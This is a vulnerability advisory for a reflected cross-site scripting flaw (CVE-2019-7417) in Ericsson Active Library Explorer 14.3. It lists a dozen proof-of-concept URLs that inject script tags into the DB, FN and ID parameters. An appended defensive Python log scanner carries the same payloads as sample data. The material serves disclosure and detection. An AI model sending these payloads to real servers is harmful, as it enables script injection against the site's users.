Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

  • Ericsson Active Library Explorer (ALEX)
    version 14.3 suffers from a cross site scripting vulnerability.
    MD5 | be90b6131177b2b6605b05cead5c01d2

    <!--  
    # Exploit Title: Cross Site Scripting in Ericsson Active Library Explorer  
    Server Version 14.3  
    # Date: 23-01-2019  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.ericsson.com  
    # Software Link: http://www.ericsson.com  
    # Version: Ericsson Active Library Explorer Server Version 14.3  
    # Tested on: all  
    # CVE : CVE-2019-7417  
    # Category: webapps  
    1. Description  
    XSS exists in Ericsson Active Library Explorer (ALEX) 14.3 in multiple  
    parameters in the "/cgi-bin/alexserv" servlet, as demonstrated by the DB,  
    FN, fn, or id parameter.  
    Active Library Explorer (ALEX) is server-based software that enables users  
    to browse Ericsson document libraries and documents with a standard web  
    browser. It consists of the following two parts, which are typically used  
    in two different web browser windows:  
    Library View - this part contains functions for accessing libraries  
    within a folder structure. For example, it is possible to search for  
    libraries, download libraries, or compare library variants. It is also  
    possible to start a search for documents in several libraries at the same  
    time.  
    Document View - this part contains functions for accessing documents  
    inside a library. For example, it is possible to search for documents or  
    within documents in individual libraries, and to print or bookmark  
    documents.  
    2. Proof of Concept  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    fn=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    id=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&fn=docno_metadata.txt  
    Parameter  
    id=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=23034&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    fn=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=hlex_help.html  
    Parameter  
    ID=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=3020&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=alex.html  
    Parameter  
    DB=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&ac=image&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    fn=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=alex_help.ahx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&CH=LibraryBrowser  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=12446-2885Uen.E.html  
    Parameter  
    DB=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&AC=image&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=help.html&CH=LibraryBrowser  
    Parameter  
    DB=<SCRIPT>alert("XSS");</SCRIPT>  
    3. Solution:  
    Update to the latest version of this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    

    Source: packetstormsecurity.com
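
For defenders reviewing web server logs for requests shaped like the proof-of-concept URLs above, the following added example (not part of the original advisory or of Ericsson's software) flags `/cgi-bin/alexserv` requests whose DB, FN/fn or ID/id value falls outside a conservative allowlist. The combined log format, the allowlist pattern and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as injectable; the PoC URLs use both cases.
WATCHED = {"db", "fn", "id"}
# Assumption: legitimate values look like the benign ones in the PoC URLs
# (e.g. 23034, alex.html, BSP_R8.1-LZN7800023_R8B.alx).
SAFE_VALUE = re.compile(r"[A-Za-z0-9._-]+")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return [(name, decoded_value)] for watched alexserv parameters whose
    value falls outside the allowlist; empty list if the line is clean."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path != "/cgi-bin/alexserv":
        return []
    hits = []
    # parse_qsl percent-decodes once, so a double-encoded value keeps a
    # literal '%' and is rejected by the allowlist as well.
    for name, value in parse_qsl(url.query):
        if name.lower() in WATCHED and not SAFE_VALUE.fullmatch(value):
            hits.append((name, value))
    return hits

# Constructed sample log lines (documentation IP addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jan/2019:10:00:01 +0000] "GET /cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=alex.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jan/2019:10:00:09 +0000] "GET /cgi-bin/alexserv?VR=R18D&id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&fn=docno_metadata.txt HTTP/1.1" 200 812',
    '198.51.100.7 - - [23/Jan/2019:10:00:12 +0000] "GET /cgi-bin/alexserv?ID=3020&FN=%253Cb%253E HTTP/1.1" 200 640',
    '192.0.2.10 - - [23/Jan/2019:10:00:20 +0000] "GET /index.html?id=%3Cb%3E HTTP/1.1" 200 100',
]

def scan(lines):
    """Map line index -> suspicious parameters for lines that have any."""
    return {i: h for i, line in enumerate(lines) if (h := suspicious_params(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

The same allowlist can serve as server-side input validation in front of the servlet, alongside the output encoding rules the advisory links to.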
